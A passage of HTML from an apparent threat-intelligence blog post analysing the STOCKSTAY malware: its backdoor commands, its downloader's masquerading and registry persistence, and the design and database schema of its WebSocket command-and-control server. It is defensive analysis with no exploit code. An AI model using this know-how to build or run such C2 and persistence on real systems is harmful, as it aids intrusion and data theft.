&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;RmDir&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Delete the specified directories.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of directory paths, each of which will be deleted. Confirmation of each deleted directory, or deletion failure, is returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Run&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Execute a new process.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a path to the file to execute and its corresponding arguments. A default timeout of 60 seconds is hard-coded into the malware, however this can be overridden by the task configuration.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;All subprocesses are created windowless with redirected stdout.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Sysinfo&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Conduct a system survey to gather key information about the infected host.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Operating system information is collected via the Windows Management Instrumentation (WMI) ManagementObjectSearcher, specifically the following fields:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;OSVersion&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Architecture&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;SerialNumber&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeSet&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CountryCode&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Locale&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;InstallDate&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BootupTime&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MachineName&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;SystemDirectory&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;LocalTime&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AnsiCodePage&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UserName&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With respect to hardware, WMI is queried for the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ProcessorName&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;NumberCores&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ClockSpeed&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MemoryCapacity&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MemoryType&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;DiskModel &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;DiskSize&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The malware also captures a list of the names of running processes.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;UnpackArchive&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Extract the specified ZIP file to its current directory.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 1: Backdoor commands supported by STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Related Downloaders and Installers&lt;/span&gt;&lt;/h4&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.MARKETMAKER&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.MARKETMAKER is a proxy-aware downloader written in .NET using the Windows Forms framework that downloads and extracts additional payloads from a remote server, establishes persistence through Windows registry modifications, and runs silently in the background with no user interface. This downloader has been observed masquerading as "MicrosoftUpdateOneDrive" to appear legitimate while setting up multiple autorun entries to execute the core components of STOCKSTAY.&lt;/span&gt;&lt;/p&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;.NET AppDomainManager&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;During our analysis, GTIG identified what we believe to be an early development sample of STOCKSTAY.MARKETMAKER which, instead of downloading the required components, was dependent on external mechanisms (such as &lt;/span&gt;&lt;a href="https://attack.mitre.org/techniques/T1574/014/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;.NET AppDomainManager injection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;) for the initial deployment of samples to the target host.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY Server-Side Controller&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified a publicly accessible GitHub repository containing a Python implementation of the victim-facing STOCKSTAY WebSocket server controller. The lightweight design of the server component appears to supplement the threat actor’s usage of third-party hosting platforms such as &lt;/span&gt;&lt;a href="https://render.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Render&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; platform which provides a platform for hosting web services, including &lt;/span&gt;&lt;a href="https://render.com/docs/websocket" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSockets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. The inability for the server to decrypt inbound messages prevents introspection by platform operators, and further obfuscates the location of the threat actor’s dedicated infrastructure. This architecture somewhat resembles Turla’s multi-hop KAZUAR C2 infrastructure.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Overview of STOCKSTAY C2 Infrastructure" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig4.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 4: Overview of STOCKSTAY C2 Infrastructure&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The server extends &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;tornado.websocket.WebSocketHandler&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to provide the interface described in Table 2, under the path &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;; aligning with all observed STOCKSTAY WebSocket C2 URLs.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Event&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Description&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.check_origin" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocketHandler.check_origin&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hard-coded to return True to &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;accept all cross-origin traffic.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.open" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocketHandler.open&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Logs the client’s IP address using the following string format:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;WebSocket open. IP: {client_ip}&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_message" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocketHandler.on_message&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Handles inbound messages from the connected client.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inbound messages are base64-decoded before being parsed as JSON into an object internally known as a “package”.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each “package” contains an “action” and a “container”, which provide the request’s type and associated data, respectively. The following describes the handling logic of each action type.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Action: &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;send&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The server extracts the following attributes from the inbound message’s “container” and inserts them into a new row within the local &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_data&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; database table.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;container.target&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The STOCKSTAY client populates this field with the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;internal_id&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;i_id&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; field from the config file.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;container.sender&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The STOCKSTAY client populates this field with the unique client uuid generated on first execution.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;container.message&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This field contains the encrypted message body in a format referred to within the STOCKSTAY client as “CryptoContainer”. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On completion, the server logs the following message:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Action: send; trgt={target_id}; sndr={sender_id}&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Action: &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;recv&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inbound &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;recv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; requests simply specify the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.sender&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; attribute, which corresponds with the client’s unique identifier.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The server then retrieves all messages from the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_data&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; database table where the target identifier (“degrees” column) matches the specified &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.sender&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. This has the effect of allowing the client to retrieve all messages intended for it, such as those sent to the server by an upstream C2 controller.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each matching row is returned to the client in the following format, before being deleted from the database.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;{
	"target": degrees,
	"sender": pressure,
	"message": wdata,
	"ip": coords,
	"time": datetime
}&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On completion, the server logs the following message:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Action: recv; sndr={sender}&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_close" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocketHandler.on_close&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Logs the client’s IP address using the following string format:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;WebSocket close. IP: {client_ip}&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 2: Overview of STOCKSTAY WebSocket Server Interface&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Database Structure&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The server maintains a local SQLite3 database under the filename &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_data1.db&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, structured as shown in Tables 3 and 4.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Column&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;id&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Primary key&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;degrees&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Recipient's UUID from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.target&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;pressure&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Sender's UUID from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.sender&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wdata&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Message data from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.message&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;coords&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Sender's IP address, extracted from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;X-Forwarded-For&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; header, or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;none_ip&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; if no sender specified.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;status&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Defaults to 0 - doesn't appear to be used or returned to the client.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;datetime&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Time of row creation&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 3: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_data&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; database table structure&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
